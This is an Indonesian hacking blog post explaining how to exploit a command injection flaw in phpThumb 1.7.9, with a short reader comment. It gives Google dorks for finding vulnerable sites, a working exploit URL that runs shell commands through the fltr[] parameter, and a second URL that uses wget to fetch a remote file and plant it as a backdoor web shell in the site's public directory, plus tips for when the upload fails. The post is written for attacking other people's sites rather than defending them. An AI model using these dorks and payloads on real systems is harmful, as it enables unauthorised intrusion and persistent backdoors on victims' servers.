Selasa, 09 Juli 2019

phpThumb Command Injection Vulnerability


Command Injection adalah kerentanan format string yang terjadi ketika input pengguna yang tidak difilter kemudian diteruskan ke shell system() , exec() , dll). penyerang dapat mengeksploitasi kerentanan ini dengan urutan perintah yang ditambahkan ke format yang sesuai untuk mengeksekusi perintah shell.
Okelah, langsung saja..

phpThumb v 1.7.9
Dork :
inurl:/phpThumb.php?src=
inurl:/phpthumb index of
inurl:/phpthumb/cache ext:jpg

Dah, selebihnya use ur brain.
Ok, Next...

Kuanggap kalian udah dapat targetnya.

Ex:
http://site.com/[path]/phpThumb.php


Sekarang masukin Exploitnya, disini saya menggunakan perintah ls -al untuk mengintip ciee ngintip apaan lo coeg.
Exploit :
http://site.com/[path]/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;pwd;uname -a;ls -al;&phpThumbDebug=9

Vuln
(NOTE*)
Jika pada saat memasukkan exploit dan tidak muncul directory nya berarti shell_exec disable, jadi tinggalin aja mzz.. cari lain v:

Dan sekarang kita coba sisipkan shell backdoor, disini saya menggunakan wget
Ketikan peritah :
http://site.com/[path]/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -al;wget http://site.com/Shell.txt -O /home/user/public_html/shell.php;&phpThumbDebug=9

Pada saat menyisipkan shell backdoor dan saat di akses not found, pindahkan file nya ke directory writable (dir hijau)

min, kok akses nya blank?
Coba ketikkan perintah :
wget -S http://site.com/shell.txt -O /home/user/public_html/shell.php



Ok, sekian terima kasih ^-^

Romeltea Media
Hekedbay Updated at:
Get Free Updates:
*Please click on the confirmation link sent in your Spam folder of Email*

1 Comment so far. What are your thoughts?

  1. #ask
    Biar kita tau itu vuln ato tidak nya gmana mas?? Misal page ada tulisan gtu ato apa..
    Masih kurang paham

    BalasHapus